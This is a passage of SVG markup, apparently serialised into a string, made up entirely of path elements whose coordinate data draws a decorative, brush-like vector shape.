d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n <path 